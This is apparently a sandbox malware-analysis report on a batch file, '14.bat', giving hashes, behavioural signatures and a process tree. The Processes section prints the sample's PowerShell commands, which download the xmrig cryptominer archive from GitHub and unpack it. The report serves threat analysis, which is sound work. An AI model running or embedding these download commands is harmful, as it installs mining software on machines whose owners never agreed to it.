Overview
overview
10Static
static
11.bat
windows7-x64
101.bat
windows10-2004-x64
1010.bat
windows7-x64
1010.bat
windows10-2004-x64
1011.bat
windows7-x64
1011.bat
windows10-2004-x64
1012.bat
windows7-x64
1012.bat
windows10-2004-x64
1013.bat
windows7-x64
1013.bat
windows10-2004-x64
1014.bat
windows7-x64
1014.bat
windows10-2004-x64
1015.bat
windows7-x64
1015.bat
windows10-2004-x64
102.bat
windows7-x64
102.bat
windows10-2004-x64
103.bat
windows7-x64
103.bat
windows10-2004-x64
104.bat
windows7-x64
104.bat
windows10-2004-x64
105.bat
windows7-x64
105.bat
windows10-2004-x64
106.bat
windows7-x64
106.bat
windows10-2004-x64
107.bat
windows7-x64
107.bat
windows10-2004-x64
108.bat
windows7-x64
108.bat
windows10-2004-x64
109.bat
windows7-x64
109.bat
windows10-2004-x64
10Analysis
-
max time kernel
118s -
max time network
119s -
platform
windows7_x64 -
resource
win7-20240220-en -
resource tags
arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system -
submitted
22-05-2024 02:54
Static task
static1
Behavioral task
behavioral1
Sample
1.bat
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
1.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral3
Sample
10.bat
Resource
win7-20240508-en
Behavioral task
behavioral4
Sample
10.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral5
Sample
11.bat
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
11.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral7
Sample
12.bat
Resource
win7-20231129-en
Behavioral task
behavioral8
Sample
12.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral9
Sample
13.bat
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
13.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral11
Sample
14.bat
Resource
win7-20240220-en
Behavioral task
behavioral12
Sample
14.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral13
Sample
15.bat
Resource
win7-20240221-en
Behavioral task
behavioral14
Sample
15.bat
Resource
win10v2004-20240226-en
Behavioral task
behavioral15
Sample
2.bat
Resource
win7-20240221-en
Behavioral task
behavioral16
Sample
2.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral17
Sample
3.bat
Resource
win7-20240221-en
Behavioral task
behavioral18
Sample
3.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral19
Sample
4.bat
Resource
win7-20240220-en
Behavioral task
behavioral20
Sample
4.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral21
Sample
5.bat
Resource
win7-20240215-en
Behavioral task
behavioral22
Sample
5.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral23
Sample
6.bat
Resource
win7-20240221-en
Behavioral task
behavioral24
Sample
6.bat
Resource
win10v2004-20240508-en
Behavioral task
behavioral25
Sample
7.bat
Resource
win7-20240508-en
Behavioral task
behavioral26
Sample
7.bat
Resource
win10v2004-20240426-en
Behavioral task
behavioral27
Sample
8.bat
Resource
win7-20240419-en
Behavioral task
behavioral28
Sample
8.bat
Resource
win10v2004-20240426-en
Behavioral task
behavioral29
Sample
9.bat
Resource
win7-20240221-en
General
-
Target
14.bat
-
Size
599B
-
MD5
798b979417aa88e5323ead9be2d8425c
-
SHA1
a54c5133c71afddf697f302b36bdb930c72852ce
-
SHA256
f83d724987f9f4a0843c0b0abd01f3f5ceccbc8e7babad76c2639e1bef2fee07
-
SHA512
a4f2ff598bc26b5ee7778b34b34aafd20e43f714c5f841b9fe73cdc6e1c3e47e44ffb94ff06ccd7dd263116201ff6754c956c1ea8f588acf6927f35446b5036b
Malware Config
Extracted
https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip
Signatures
-
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 5 1740 powershell.exe 6 1740 powershell.exe -
Processes:
powershell.exepowershell.exepid process 1740 powershell.exe 2652 powershell.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 1740 powershell.exe 2652 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 1740 powershell.exe Token: SeDebugPrivilege 2652 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.exedescription pid process target process PID 2068 wrote to memory of 1740 2068 cmd.exe powershell.exe PID 2068 wrote to memory of 1740 2068 cmd.exe powershell.exe PID 2068 wrote to memory of 1740 2068 cmd.exe powershell.exe PID 2068 wrote to memory of 2652 2068 cmd.exe powershell.exe PID 2068 wrote to memory of 2652 2068 cmd.exe powershell.exe PID 2068 wrote to memory of 2652 2068 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\14.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2068 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/xmrig/xmrig/releases/download/v6.21.3/xmrig-6.21.3-msvc-win64.zip', 'xmrig-6.21.3-msvc-win64.zip')"2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1740 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Expand-Archive -Path 'xmrig-6.21.3-msvc-win64.zip' -DestinationPath '.'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2652
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QJC1W7N8LPXC36SE5KF4.temp
Filesize7KB
MD52f1aed0972d77f7b401898fc4bcb9c15
SHA19f476e0cfd35754ca7b6f2e8bc5b3180bf6e7871
SHA256c93db24681b2d5c32d45e28876530e814451786b9a244c4de5061deae1ce402d
SHA512231ab3c4e6e0616ee3a66d924782dce7b77715de30d61866544f8977eef4f67bcde3814e07f63aec59aecd956c754fed293fc9def2fee34d15fd6f29d44953a6